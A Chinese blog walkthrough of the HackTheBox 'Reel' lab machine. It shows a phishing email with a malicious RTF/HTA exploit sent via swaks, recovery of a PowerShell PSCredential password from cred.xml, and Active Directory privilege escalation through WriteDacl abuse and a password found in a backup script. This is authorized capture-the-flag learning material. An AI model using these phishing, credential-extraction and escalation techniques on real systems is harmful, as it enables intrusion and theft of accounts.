本文详述了在HackTheBox平台上的Reel靶机渗透过程,通过客户端攻击绕过防御,利用ActiveDirectory环境特权提升技巧。涵盖信息收集、漏洞利用、权限提升及ActiveDirectory管理。
**
HackTheBox-windows-Reel-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/143
靶机难度:中级(5.0/10)
靶机发布日期:2018年11月10日
靶机描述:
Reel is medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter, and highlights a technique for gaining privileges in an Active Directory environment.
作者:大余
时间:2020-03-23
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.77…
Nmap可以看到这是一台Windows Server 2012 R2服务器,该服务器承载FTP,SSH,SMTP和Active Directory域等服务…
可以看到nmap发现ftp是可以匿名访问的…并且存在documents目录…进去看看…
将documents目录文件全都下载了…
意思是可以发送xtf格式的电子邮件给靶机…继续查看下一个文件
果然,查看到了电子邮件…nico@megabank.com
这边有了电子邮件号,肯定是要给他发邮件的,而且发送的邮件内容得是.xtf的…这里又可以用钓鱼邮件恶意程序进行提权了…
这里我搜索了rtf的漏洞,这是一个Microsoft Office oday漏洞…
这个漏洞利用了.rtf文件(或有些已重命名为.doc),该文件将连接到远程服务器,然后下载包含HTML应用程序内容的文件,并作为.hta文件来执行,由于.hta是可执行文件,因此攻击者可以在受害者的计算机上执行完整的代码,此逻辑错误还使攻击者可以绕过Microsoft开发的任何基于内存的缓解措施来执行…(可怕的oday漏洞)
查找到了exploit,走起
配置好后,这里还需要修改FILENAME为.rtf即可…
可以看到创建好了恶意程序.rtf文件…而且还托管在了default.hta上…
命令:swaks --to nico@megabank.com --server 10.10.10.77 --attach /root/.msf4/local/dayu.rtf
可以看到成功获得了shell壳…
这里还可以利用mutt、sendemail、telnet等等工具进行发送邮件…不演示了…最近头疼得厉害…
并且直接获得了user信息…
可以看到,在desktop下还存在xml文件,查看后发现了有用的信息…
获得的信息有:XML文件、Objs版本是1.1.0.1、PSC的凭证、用户名:Tom、密码:哈希值…
那么需要破解这个哈希值即可…
找了半天以为是很好破解的哈希值,这里我还注意到了一个信息…PSCredential
PSCredential是powershell中的一个对象,该对象提供了一种存储用户名,密码和凭据的方法,还有两个功能,Import-CliXml和Export-CliXml,用于将这些凭据保存到文件或从文件中还原他,开始利用…
命令:powershell " $credential = Import-CliXml -Path 'C:\Users\nico\Desktop\cred.xml' ; $credential.getnetworkcredential() | fl *"
可以看到已经获得了密码…
可以看到在Tom的桌面上,有一个名为Bloodhound的文件夹和一个文件note.txt…
文件里告诉我们,SharpHound允许我们发现Active Directory环境中的隐藏依赖关系,并且与BloodHound一起在图形界面中形成依赖关系…
继续往下看,可以看到存在了关系图BloodHound…把acls.csv放到本地,进行查看即可…可以利用smbserver共享传递即可…
net use z: \10.10.14.11\share
copy “文件” z:
这里我就不说分析BloodHound的事情了…头很疼…也忘了截图…
这里利用了系统里的PowerView.ps1,然后powershell下利用对象进行修改了claire用户的密码…成功修改…
经过前面的信息,知道clair对Backup_Admins组具有WriteDacl权限,我可以用它来将她添加到群组中。首先,看到该组的唯一成员是ranj…
然后把chair加入进去…
可以看到已经成功加入了…但是没生效,得重新登录…
重新登录后…以claire和Backup_Admins的身份返回,可以检查Administrator文件夹上的权限了…
这里可以看到root信息还无法查看…继续往下走,在BackupScript.ps1里发现了passwd…这是管理员的密码…真是一环套一环…
成功获得root信息…
今天头很疼,但是还是下班后坚持拿下了这台靶机…加油吧,努力的人都很幸运!!!
由于我们已经成功得到root权限查看user.txt和root.txt,因此完成了中级靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
